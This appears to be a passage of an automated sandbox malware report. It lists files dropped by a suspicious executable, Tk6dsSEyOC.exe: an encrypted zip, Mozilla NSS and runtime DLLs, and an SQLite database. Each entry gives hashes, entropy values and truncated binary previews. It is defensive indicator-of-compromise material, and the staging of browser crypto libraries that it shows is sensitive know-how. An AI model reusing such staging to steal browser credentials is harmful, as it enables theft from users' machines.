                                                                                                                                                  Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....@.\.........."!.........f...............................................p............@.........................p...P............@..x....................P......0...T...............................@...............8............................text...d........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\kE9gS2wR6.zip
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2828315
                                                                                                                                                  Entropy (8bit):7.998625956067725
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:49152:tiGLaX5/cgbRETlc0EqgSVAx07XZiEi4qiefeEJGt5ygL0+6/qax:t9OX9alwJSVP1fnefekGt5CP
                                                                                                                                                  MD5:1117CD347D09C43C1F2079439056ADA3
                                                                                                                                                  SHA1:93C2CE5FC4924314318554E131CFBCD119F01AB6
                                                                                                                                                  SHA-256:4CFADA7EB51A6C0CB26283F9C86784B2B2587C59C46A5D3DC0F06CAD2C55EE97
                                                                                                                                                  SHA-512:FC3F85B50176C0F96898B7D744370E2FF0AA2024203B936EB1465304C1C7A56E1AC078F3FDF751F4384536602F997E745BFFF97F1D8FF2288526883185C08FAF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: PK.........znN<..{r....i......nssdbm3.dll...|...8...N..Y..6.$J.....$1...D .a.....jL.V..C...N.;....}./............$...Z,T.R.qc...Ec.=................;..{..s....p.`..A.?M.....W!.....a..?N...~e.A..W.o.....[.}...,...;.+\....Jw.|...k.......<yR.^.E.o.nxs.c...=V....,..F....cu.....w.O..[..u.{..<.w....7P...{..K~..E..w...c...z^..[Z....6.G.V.2..+.n4......1M.......w{f..nJL..{. d......M..+.. ......./.)..$X!......L..K.`.M...w.I..LA8r.IX...r...87..}........<.].r.....TWm......b6/._....a..W.lB...3.n.._...j....o.Mz.._Q........8....K.*...........gr..L..*H...v....6[*...4I...{.1g..<..>M..$G.&Y........-.....O..9\...,t..W.m.X ..Y.3.*...S<#}.".>.0RBg,...lh.s..o.....r.p8...)..3..K.v....ds.n3.+]....+....krMu._.Y\..../8T......&.BC.".u..;..e.k u$......~`.{.!.M...\W.Y.37+nQ.Z.*...3\G..5d....Z.hVL..Z.|k.5...XF.Y..lVVW..C..|.....b..\.Z...m. ..0...P.F8{].U.p..RW,n...MM.....s..._@..>Q.. ...N.>.T?WM....)9B.............mVW.......b.6{..|!......O....M....>.>.$\.%..L.zF.l...3
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldap60.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):132048
                                                                                                                                                  Entropy (8bit):6.627391684128337
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:qgXCFTvwqiiynFa6zqeqQZ06DdEH4sq9gHNaIkIQhEwe:qdvwqMFbOePIP/zkIQ2h
                                                                                                                                                  MD5:5A49EBF1DA3D5971B62A4FD295A71ECF
                                                                                                                                                  SHA1:40917474EF7914126D62BA7CDBF6CF54D227AA20
                                                                                                                                                  SHA-256:2B128B3702F8509F35CAD0D657C9A00F0487B93D70336DF229F8588FBA6BA926
                                                                                                                                                  SHA-512:A6123BA3BCF9DE6AA8CE09F2F84D6D3C79B0586F9E2FD0C8A6C3246A91098099B64EDC2F5D7E7007D24048F10AE9FC30CCF7779171F3FD03919807EE6AF76809
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q...?S..?S..?S..S..?S|.>R..?S;..S..?S|.<R..?S|.:R..?S|.;R..?S..>R..?S..>S..?Sn.;R.?Sn.?R..?Sn..S..?Sn.=R..?SRich..?S........................PE..L....@.\.........."!.........f...... ........................................0............@.............................................x.................... ......p...T..............................@...............\............................text...:........................... ..`.rdata...@.......B..................@..@.data...l...........................@....rsrc...x...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldif60.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):20432
                                                                                                                                                  Entropy (8bit):6.337521751154348
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:YxfML3ALxK0AZEuzOJKRsIFYvDG8A3OPLonw4S:0fMmxFyO4RpGDG8MjS
                                                                                                                                                  MD5:4FE544DFC7CDAA026DA6EDA09CAD66C4
                                                                                                                                                  SHA1:85D21E5F5F72A4808F02F4EA14AA65154E52CE99
                                                                                                                                                  SHA-256:3AABBE0AA86CE8A91E5C49B7DE577AF73B9889D7F03AF919F17F3F315A879B0F
                                                                                                                                                  SHA-512:5C78C5482E589AF7D609318A6705824FD504136AEAAC63F373E913DA85FA03AF868669534496217B05D74364A165D7E08899437FCC0E3017F02D94858BA814BB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9..j..j..j...j..j^..k..j^..k..j^..k..j^..k..j...k..j..j..jL..k..jL..k..jL.bj..jL..k..jRich..j........................PE..L....<.\.........."!................Y........0...............................p......r.....@..........................5.......6.......P..x............2.......`..x....0..T...........................(1..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc...x....P.......,..............@..@.reloc..x....`.......0..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\lgpllibs.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):55760
                                                                                                                                                  Entropy (8bit):6.738700405402967
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:LxsBS3Q6j+37mWT7DT/GszGrn7iBCmjFCOu:LxTBcmWT7X/Gszen7icmjFtu
                                                                                                                                                  MD5:56E982D4C380C9CD24852564A8C02C3E
                                                                                                                                                  SHA1:F9031327208176059CD03F53C8C5934C1050897F
                                                                                                                                                  SHA-256:7F93B70257D966EA1C1A6038892B19E8360AADD8E8AE58E75EBB0697B9EA8786
                                                                                                                                                  SHA-512:92ADC4C905A800F8AB5C972B166099382F930435694D5F9A45D1FDE3FEF94FAC57FD8FAFF56FFCFCFDBC61A43E6395561B882966BE0C814ECC7E672C67E6765A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...........l...l...l.......l..~....l..9...l..~....l..~....l..~....l.......l..l....l...l...l...l...l..l....l..l....l..l....l..l..l..l....l..Rich.l..........................PE..L...z@.\.........."!.........2......................................................t.....@...........................................x...............................T...............................@............................................text.............................. ..`.rdata..>...........................@..@.data...............................@....rodata.8...........................@..@.rsrc...x...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\libEGL.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):22480
                                                                                                                                                  Entropy (8bit):6.528357540966124
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:INZ9mLVDAffJJKAtn0mLAb8X3FbvDG8A3OPLonzvGb:4mx+fXvn4YFrDG8MKb
                                                                                                                                                  MD5:96B879B611B2BBEE85DF18884039C2B8
                                                                                                                                                  SHA1:00794796ACAC3899C1FB9ABBF123FEF3CC641624
                                                                                                                                                  SHA-256:7B9FC6BE34F43D39471C2ADD872D5B4350853DB11CC66A323EF9E0C231542FB9
                                                                                                                                                  SHA-512:DF8F1AA0384A5682AE47F212F3153D26EAFBBF12A8C996428C3366BEBE16850D0BDA453EC5F4806E6A62C36D312D37B8BBAFF549968909415670C9C61A6EC49A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N{.N{.N{.6..N{.F,z.N{.F,x.N{.F,~.N{.F,..N{..z.N{.T-z.N{.Nz..N{.T-~.N{.T-{.N{.T-..N{.T-y.N{.Rich.N{.........................PE..L...aA.\.........."!.........(............... ...............................p......~.....@..........................%..........d....P..x............:.......`.......!..T............................"..@............ ...............................text... ........................... ..`.rdata....... ......................@..@.data........@.......2..............@....rsrc...x....P.......4..............@..@.reloc.......`.......8..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):83408
                                                                                                                                                  Entropy (8bit):6.436278889454398
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:CNr03+TtFKytqB0EeCsu1sW+cdQOTki9jHiU:CNrDKHBBjXQSki9OU
                                                                                                                                                  MD5:385A92719CC3A215007B83947922B9B5
                                                                                                                                                  SHA1:38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
                                                                                                                                                  SHA-256:06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
                                                                                                                                                  SHA-512:9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mR;...;...;.......2.......G.......).......*.......".......4.......>...;...n.......:.......:.......:.......:...Rich;...........................PE..L....=.\.........."!.........................................................`......>.....@.............................l.......<....@..P............(.......P..d...0...T...............................@............................................text............................... ..`.rdata..Z[.......\..................@..@.data........ ......................@....rsrc...P....@......................@..@.reloc..d....P......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32_InUse.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):83408
                                                                                                                                                  Entropy (8bit):6.436278889454398
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:CNr03+TtFKytqB0EeCsu1sW+cdQOTki9jHiU:CNrDKHBBjXQSki9OU
                                                                                                                                                  MD5:385A92719CC3A215007B83947922B9B5
                                                                                                                                                  SHA1:38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
                                                                                                                                                  SHA-256:06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
                                                                                                                                                  SHA-512:9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mR;...;...;.......2.......G.......).......*.......".......4.......>...;...n.......:.......:.......:.......:...Rich;...........................PE..L....=.\.........."!.........................................................`......>.....@.............................l.......<....@..P............(.......P..d...0...T...............................@............................................text............................... ..`.rdata..Z[.......\..................@..@.data........ ......................@....rsrc...P....@......................@..@.reloc..d....P......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozglue.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):137168
                                                                                                                                                  Entropy (8bit):6.784614237836286
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:Z6s2DIGLXlNJJcPoN0j/kVqhp1qt/TXTv7q1D2JJJvPhrSeXZ5dR:MszGLXlNrE/kVqhp12/TXTjSD2JJJvPt
                                                                                                                                                  MD5:EAE9273F8CDCF9321C6C37C244773139
                                                                                                                                                  SHA1:8378E2A2F3635574C106EEA8419B5EB00B8489B0
                                                                                                                                                  SHA-256:A0C6630D4012AE0311FF40F4F06911BCF1A23F7A4762CE219B8DFFA012D188CC
                                                                                                                                                  SHA-512:06E43E484A89CEA9BA9B9519828D38E7C64B040F44CDAEB321CBDA574E7551B11FEA139CE3538F387A0A39A3D8C4CBA7F4CF03E4A3C98DB85F8121C2212A9097
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...{>.\.........."!.....z...................................................@......j.....@A........................@...t.......,.... ..x....................0..l.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..l....0......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\msvcp140.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):440120
                                                                                                                                                  Entropy (8bit):6.652844702578311
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
                                                                                                                                                  MD5:109F0F02FD37C84BFC7508D4227D7ED5
                                                                                                                                                  SHA1:EF7420141BB15AC334D3964082361A460BFDB975
                                                                                                                                                  SHA-256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
                                                                                                                                                  SHA-512:46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\nss3.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1245136
                                                                                                                                                  Entropy (8bit):6.766715162066988
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:ido5Js2a56/+VwJebKj5KYFsRjzx5ZxKV6D1Z4Go/LCiytoxq2Zwn5hCM4MSRdY8:Q2aY4w6aozx5ZWMM7yew8MSRK1y
                                                                                                                                                  MD5:02CC7B8EE30056D5912DE54F1BDFC219
                                                                                                                                                  SHA1:A6923DA95705FB81E368AE48F93D28522EF552FB
                                                                                                                                                  SHA-256:1989526553FD1E1E49B0FEA8036822CA062D3D39C4CAB4A37846173D0F1753D5
                                                                                                                                                  SHA-512:0D5DFCF4FB19B27246FA799E339D67CD1B494427783F379267FB2D10D615FFB734711BAB2C515062C078F990A44A36F2D15859B1DACD4143DCC35B5C0CEE0EF5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c.4.'.Z.'.Z.'.Z.....3.Z...[.%.Z.B..#.Z...Y.*.Z..._.-.Z...^.,.Z...[./.Z..[.$.Z.'.[...Z..^.-.Z..Z.&.Z...&.Z..X.&.Z.Rich'.Z.........................PE..L....@.\.........."!.........................................................@......Q.....@................................x=..T.......p........................|......T...........................h...@............................................text............................... ..`.rdata...Q.......R..................@..@.data...tG...`..."...>..............@....rsrc...p............`..............@..@.reloc...|.......~...d..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssckbi.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):336336
                                                                                                                                                  Entropy (8bit):7.0315399874711995
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:8bndzEL04gF85K9autIMyEhZ/V3psPyHa9tBe1:8bndzEL04pnutIMyAp2z9tBe1
                                                                                                                                                  MD5:BDAF9852F588C86B055C846B53D4C144
                                                                                                                                                  SHA1:03B739430CF9EADE21C977B5B416C4DD94528C3B
                                                                                                                                                  SHA-256:2481DA1C459A2429A933D19AD6AE514BD2AE59818246DDB67B0EF44146CED3D8
                                                                                                                                                  SHA-512:19D9A952A3DF5703542FA52A5A780C2E04D6A132059F30715954EAC40CD1C3F3B119A29736D4A911BE85086AFE08A54A7482FA409DFD882BAC39037F9EECD7EF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pi.Pi.Pi.(..Pi.F2h.Pi.F2j.Pi.F2l.Pi.F2m.Pi.0h.Pi.T3h.Pi.Ph.Pi.T3m.Pi.T3i.Pi.T3..Pi.T3k.Pi.Rich.Pi.........PE..L....@.\.........."!.........`......q........................................@...........@.............................P.......d.......x.......................t)..p...T..............................@............................................text.............................. ..`.rdata..>...........................@..@.data....N.......L..................@....rsrc...x...........................@..@.reloc..t).......*..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssdbm3.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):92624
                                                                                                                                                  Entropy (8bit):6.639527605275762
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:YvNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41Pc:+NGVOiBZbcGmxXMcBqmzoCUZoZebHPAT
                                                                                                                                                  MD5:94919DEA9C745FBB01653F3FDAE59C23
                                                                                                                                                  SHA1:99181610D8C9255947D7B2134CDB4825BD5A25FF
                                                                                                                                                  SHA-256:BE3987A6CD970FF570A916774EB3D4E1EDCE675E70EDAC1BAF5E2104685610B0
                                                                                                                                                  SHA-512:1A3BB3ECADD76678A65B7CB4EBE3460D0502B4CA96B1399F9E56854141C8463A0CFCFFEDF1DEFFB7470DDFBAC3B608DC10514ECA196D19B70803FBB02188E15E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L....@.\.........."!.........0...............0......................................*q....@......................... ?......(@.......`..x............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..D....0... ..................@..@.data........P.......>..............@....rsrc...x....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\prldap60.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):24016
                                                                                                                                                  Entropy (8bit):6.532540890393685
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:TQJMOeAdiNcNUO3qgpw6MnTmJk0llEEHAnDl3vDG8A3OPLondJJs2z:KMaNqb6MTmVllEK2p/DG8MlsQ
                                                                                                                                                  MD5:6099C438F37E949C4C541E61E88098B7
                                                                                                                                                  SHA1:0AD03A6F626385554A885BD742DFE5B59BC944F5
                                                                                                                                                  SHA-256:46B005817868F91CF60BAA052EE96436FC6194CE9A61E93260DF5037CDFA37A5
                                                                                                                                                  SHA-512:97916C72BF75C11754523E2BC14318A1EA310189807AC8059C5F3DC1049321E5A3F82CDDD62944EA6688F046EE02FF10B7DDF8876556D1690729E5029EA414A9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:`wq[.$q[.$q[.$x#.$s[.$.9.%s[.$.9.%p[.$.9.%{[.$.9.%z[.$S;.%s[.$.8.%t[.$q[.$=[.$.8.%t[.$.8.%p[.$.8.$p[.$.8.%p[.$Richq[.$........PE..L....@.\.........."!..... ... .......%.......0...............................p......./....@..........................5......p7..x....P..x............@.......`..$...`1..T............................1..@............0..,............................text...2........ .................. ..`.rdata.......0.......$..............@..@.data...4....@.......4..............@....rsrc...x....P.......8..............@..@.reloc..$....`.......<..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\qipcap.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):16336
                                                                                                                                                  Entropy (8bit):6.437762295038996
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:aPgr1ZCb2vGJ7b20qKvFej7x0KDWpH3vUA397Ae+PjPonZwC7Qm:aYpZPGJP209F4vDG8A3OPLonZwC7X
                                                                                                                                                  MD5:F3A355D0B1AB3CC8EFFCC90C8A7B7538
                                                                                                                                                  SHA1:1191F64692A89A04D060279C25E4779C05D8C375
                                                                                                                                                  SHA-256:7A589024CF0EEB59F020F91BE4FE7EE0C90694C92918A467D5277574AC25A5A2
                                                                                                                                                  SHA-512:6A9DB921156828BCE7063E5CDC5EC5886A13BD550BA8ED88C99FA6E7869ECFBA0D0B7953A4932EB8381243CD95E87C98B91C90D4EB2B0ACD7EE87BE114A91A9E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s6.7W..7W..7W..>/..5W...5..5W...5..6W...5..>W...5..<W...7..4W..7W..*W...4..6W...4`.6W...4..6W..Rich7W..................PE..L....B.\.........."!......................... ...............................`.......r....@..................................$..P....@..x............".......P.. .... ..T............................ ..@............ ..h............................text...P........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...x....@......................@..@.reloc.. ....P....... ..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\softokn3.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):144848
                                                                                                                                                  Entropy (8bit):6.54005414297208
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:8Af6suip+I7FEk/oJz69sFaXeu9CoT2nIVFetBW3D2xkEMk:B6POsF4CoT2OeYMzMk
                                                                                                                                                  MD5:4E8DF049F3459FA94AB6AD387F3561AC
                                                                                                                                                  SHA1:06ED392BC29AD9D5FC05EE254C2625FD65925114
                                                                                                                                                  SHA-256:25A4DAE37120426AB060EBB39B7030B3E7C1093CC34B0877F223B6843B651871
                                                                                                                                                  SHA-512:3DD4A86F83465989B2B30C240A7307EDD1B92D5C1D5C57D47EFF287DC9DAA7BACE157017908D82E00BE90F08FF5BADB68019FFC9D881440229DCEA5038F61CD6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....@.\.........."!.........b...............................................P.......|....@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\ucrtbase.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1142072
                                                                                                                                                  Entropy (8bit):6.809041027525523
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
                                                                                                                                                  MD5:D6326267AE77655F312D2287903DB4D3
                                                                                                                                                  SHA1:1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
                                                                                                                                                  SHA-256:0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
                                                                                                                                                  SHA-512:11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\qO7qM6fA3\vcruntime140.dll
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):83784
                                                                                                                                                  Entropy (8bit):6.890347360270656
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                                                                                                                                  MD5:7587BF9CB4147022CD5681B015183046
                                                                                                                                                  SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                                                                                                                                  SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                                                                                                                                  SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\LocalLow\rQF69AzBla
                                                                                                                                                  Process:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):20480
                                                                                                                                                  Entropy (8bit):0.698304057893793
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                                                                                                                  MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                                                                                                                  SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
